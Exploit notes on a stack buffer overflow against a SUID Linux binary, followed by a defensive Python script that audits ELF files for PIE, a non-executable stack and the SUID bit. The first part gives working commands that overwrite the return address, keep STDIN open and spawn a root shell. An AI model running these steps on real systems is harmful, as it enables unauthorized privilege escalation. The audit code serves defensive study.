# If the string above is a call to a shell and it's a SUID program,
# then this function can be used for a root shell.
# Write the buffer with the address of the start of the function.
# This has to be little endian and is the function entry point.
# In the example below the entry point was 0x080484cb.
# (Python 2 print syntax: it writes the raw bytes, not a UTF-8 string.)
python -c 'print "A"*<offsetbytes> + "\xcb\x84\x04\x08"' > root.txt
# You may see the shell spawn but die instantly. This is because STDIN closes early.
# Bypass this by piping input to the SUID program like below; the trailing
# `cat` keeps STDIN open so the spawned shell can read commands.
(cat root.txt; cat) | ./vulnerableprogram
# This should keep it open.
# If development was done on a copy in a writable location, now point at the live SUID binary.
(cat root.txt; cat) | /home/xdev/Desktop/vulnerableprogramsuid
# Once in the shell, upgrade it to a proper TTY:
python -c 'import pty;pty.spawn("/bin/sh")'
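From the defender's side, the overflow above only works against a binary that is SUID, non-PIE (so the function sits at a fixed address like 0x080484cb) and, for stack-resident payloads, lacks NX. The following added example, not part of the original notes, audits an ELF for exactly those three properties by parsing the ELF header and the PT_GNU_STACK program header; `make_sample_elf32` is a constructed header-only sample used for demonstration, and `audit_path` is an assumed helper name.

```python
import os
import stat
import struct

PT_GNU_STACK = 0x6474E551  # program header that records the stack's permissions
PF_X = 0x1                 # executable flag in p_flags
ET_DYN = 3                 # position-independent executable (randomised code addresses)


def audit_elf(data: bytes, mode: int) -> dict:
    """Return whether the binary is PIE, has a non-executable stack, and is SUID."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2               # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if data[5] == 1 else ">"  # EI_DATA: little or big endian
    e_type = struct.unpack_from(end + "H", data, 16)[0]
    if is64:
        phoff = struct.unpack_from(end + "Q", data, 32)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        phoff = struct.unpack_from(end + "I", data, 28)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", data, 42)
    exec_stack = None  # None: no PT_GNU_STACK at all (old toolchains: stack executable)
    for i in range(phnum):
        off = phoff + i * phentsize
        if struct.unpack_from(end + "I", data, off)[0] == PT_GNU_STACK:
            flags_off = off + 4 if is64 else off + 24  # p_flags position differs per class
            exec_stack = bool(struct.unpack_from(end + "I", data, flags_off)[0] & PF_X)
    return {
        "pie": e_type == ET_DYN,
        "nx": exec_stack is False,
        "setuid": bool(mode & stat.S_ISUID),
    }


def audit_path(path: str) -> dict:
    """Assumed helper: audit a file on disk using its real mode bits."""
    with open(path, "rb") as f:
        return audit_elf(f.read(), os.stat(path).st_mode)


def make_sample_elf32(e_type: int, stack_flags: int) -> bytes:
    """Constructed minimal little-endian ELF32 header plus one PT_GNU_STACK entry (not loadable)."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x080484CB, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0)
    return ehdr + phdr
```

A result of `{"pie": False, "nx": False, "setuid": True}` is the combination that makes the notes above applicable; rebuilding with `-fPIE -pie` and a non-executable stack, or dropping the SUID bit, removes it.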